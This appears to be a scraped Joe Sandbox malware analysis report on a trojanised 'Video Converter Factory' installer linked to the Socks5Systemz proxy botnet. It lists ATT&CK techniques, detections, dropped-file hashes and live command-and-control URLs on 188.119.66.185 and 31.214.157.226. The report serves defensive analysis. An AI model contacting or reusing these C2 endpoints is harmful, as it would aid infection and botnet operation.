                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,3_2_6095FFB2
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter
                  5
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Obfuscated Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop Protocol1
                  Input Capture
                  21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Bootkit
                  1
                  Access Token Manipulation
                  21
                  Software Packing
                  Security Account Manager2
                  File and Directory Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive11
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                  Windows Service
                  1
                  DLL Side-Loading
                  NTDS35
                  System Information Discovery
                  Distributed Component Object ModelInput Capture1
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets141
                  Security Software Discovery
                  SSHKeylogging12
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials1
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync121
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                  Process Injection
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Bootkit
                  /etc/passwd and /etc/shadow3
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Oz2UhFBTHy.exe16%ReversingLabsWin32.Trojan.Munp
                  SourceDetectionScannerLabelLink
                  C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe100%Joe Sandbox ML
                  C:\ProgramData\VideoConverterFactory\sqlite3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_setup64.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\LTDIS13n.dll (copy)0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\gdiplus.dll (copy)0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-7N8CJ.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-9MUD1.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-DEPI7.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-L1OQV.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-T8AR0.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3BKG.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3OTV.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\ltkrn13n.dll (copy)0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcp71.dll (copy)0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcr71.dll (copy)0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\sqlite3.dll (copy)0%ReversingLabs
                  C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.dll (copy)0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://188.119.66.185/UX0%Avira URL Cloudsafe
                  https://188.119.66.185/ography0%Avira URL Cloudsafe
                  https://188.119.66.185/T0%Avira URL Cloudsafe
                  https://188.119.66.185/00%Avira URL Cloudsafe
                  https://188.119.66.185/a0%Avira URL Cloudsafe
                  https://188.119.66.185/ai/?key=8f3f2b3ab100%Avira URL Cloudmalware
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328b100%Avira URL Cloudmalware
                  http://31.214.157.226/rand0%Avira URL Cloudsafe
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325100%Avira URL Cloudmalware
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4100%Avira URL Cloudmalware
                  https://188.119.66.185/-X0%Avira URL Cloudsafe
                  https://188.119.66.185/gX0%Avira URL Cloudsafe
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a100%Avira URL Cloudmalware
                  http://wonderwork.ucoz.com/0%Avira URL Cloudsafe
                  https://188.119.66.185/yX0%Avira URL Cloudsafe
                  https://188.119.66.185/?X0%Avira URL Cloudsafe
                  https://188.119.66.185/CX0%Avira URL Cloudsafe
                  https://188.119.66.185/mH0%Avira URL Cloudsafe
                  https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a52100%Avira URL Cloudmalware
                  https://188.119.66.185/ai/?key=8f3f2b3ab710463926100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328bfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://31.214.157.226/randfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965afalse
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.innosetup.com/Oz2UhFBTHy.tmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.drfalse
                      high
                      https://188.119.66.185/UXvideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://188.119.66.185/Tvideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://188.119.66.185/ographyvideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUOz2UhFBTHy.exefalse
                        high
                        https://188.119.66.185/videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineOz2UhFBTHy.exefalse
                            high
                            https://188.119.66.185/avideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003320000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://188.119.66.185/ai/?key=8f3f2b3abvideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://www.remobjects.com/psUOz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.drfalse
                              high
                              https://188.119.66.185/0videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003340000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://188.119.66.185/priseCertificatesvideoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://188.119.66.185/-Xvideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://188.119.66.185/rosoftvideoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://188.119.66.185/gXvideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://188.119.66.185/en-GBvideoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://wonderwork.ucoz.com/videoconverterfactory.exe, 00000003.00000000.1372571688.00000000004D5000.00000002.00000001.01000000.00000009.sdmp, VideoConverterFactory.exe.3.dr, is-LETAI.tmp.2.dr, videoconverterfactory.exe.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://188.119.66.185/CXvideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.remobjects.com/psOz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, Oz2UhFBTHy.tmp, 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Oz2UhFBTHy.tmp.0.dr, is-OIHIC.tmp.2.drfalse
                                      high
                                      https://188.119.66.185/?Xvideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.easycutstudio.com/support.htmlOz2UhFBTHy.exe, 00000000.00000002.2625346135.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1357693021.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1357767019.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2626002203.0000000002168000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000003.1359995199.0000000002168000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000003.1359914020.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2624390518.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://188.119.66.185/mHvideoconverterfactory.exe, 00000003.00000002.2623687277.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://188.119.66.185/yXvideoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a52videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://188.119.66.185/ai/?key=8f3f2b3ab710463926videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003336000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        31.214.157.206
                                        unknownGermany
                                        58329RACKPLACEDEfalse
                                        31.214.157.226
                                        unknownGermany
                                        58329RACKPLACEDEfalse
                                        188.119.66.185
                                        unknownRussian Federation
                                        209499FLYNETRUfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1576054
                                        Start date and time:2024-12-16 13:41:51 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 6m 42s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:9
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Oz2UhFBTHy.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:667621f07a3de153960af063462b20fe.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@5/30@0/3
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 203
                                        • Number of non-executed functions: 262
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: Oz2UhFBTHy.exe
                                        TimeTypeDescription
                                        07:43:21API Interceptor562906x Sleep call for process: videoconverterfactory.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        31.214.157.206GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                          bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                            Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                              Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                  7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                                      imMQqf6YWk.exeGet hashmaliciousSocks5SystemzBrowse
                                                        imMQqf6YWk.exeGet hashmaliciousSocks5SystemzBrowse
                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                            31.214.157.226N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 31.214.157.226/rand
                                                            cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 31.214.157.226/rand
                                                            188.119.66.185GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                              GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                s-part-0035.t-0009.t-msedge.nettWKuskUD7s.exeGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.63
                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                • 13.107.246.63
                                                                                msimg32.dllGet hashmaliciousRHADAMANTHYSBrowse
                                                                                • 13.107.246.63
                                                                                https://e.gsclinks.net/go/texastribuneorgevents.buzz/7xkxr9yg/dXJsPWh0dHBzJTNBJTJGJTJGdGV4YXN0cmlidW5lb3JnZXZlbnRzLmJ1enolMkYlM0Z0dWV0c3ZibiZsYWJlbD1FWFBMT1JFK09CSkVDVFM=Get hashmaliciousHTMLPhisherBrowse
                                                                                • 13.107.246.63
                                                                                4JQ3DknDmR.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                • 13.107.246.63
                                                                                8569FUNo1b.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                • 13.107.246.63
                                                                                TEqX8vWilW.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                • 13.107.246.63
                                                                                jNoLXYqsJS.exeGet hashmaliciousMetasploitBrowse
                                                                                • 13.107.246.63
                                                                                UUH30xVTpr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                • 13.107.246.63
                                                                                4TPPuMwzSA.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                • 13.107.246.63
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                RACKPLACEDEGEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                imMQqf6YWk.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                imMQqf6YWk.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                • 31.214.157.206
                                                                                RACKPLACEDEGEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                imMQqf6YWk.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                imMQqf6YWk.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 31.214.157.206
                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                • 31.214.157.206
                                                                                FLYNETRUGEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                51c64c77e60f3980eea90869b68c58a8GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 188.119.66.185
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\ProgramData\VideoConverterFactory\sqlite3.dllGEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                  GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                    bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                      bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                        Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                          Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                            2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                              2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                    Process:C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3099386
                                                                                                    Entropy (8bit):6.385876608035659
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:L+34icZXPo7s74/INmrJbq0U+Oc/0nu4Almy9M9w+7k59oJ1XL:ticdPo7seIgrJbqX+Opnu4AZ9M997k5g
                                                                                                    MD5:044E781B9914BD4A3851BF6BA7D7C9D9
                                                                                                    SHA1:0997A268A8B23DA1EF7410F597588DFF6C4B02FD
                                                                                                    SHA-256:EFA907CC71D1749C10429B43A4CC56C5C48EF7BA6082A4AA58849FFC11081FDF
                                                                                                    SHA-512:442C792FB94047798043B81D7CB49C5882DC04E87C280260C88A5FA1BBE81CACF0E2D33EC80C844C0FC041F08FFAEDDBE74F13A3E7F3F5A122F0942A49588684
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Reputation:low
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....._g.............................T............@.........................../.....2-0.....................................D........P..................................................................................p..........................._aett_6............................. ..`_aftt_6.j........0..................@..@_agtt_6..d.......0..................@....rsrc........P......................@..@_ahtt_6..@...`...>..................`.-.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):645592
                                                                                                    Entropy (8bit):6.50414583238337
                                                                                                    Encrypted:false
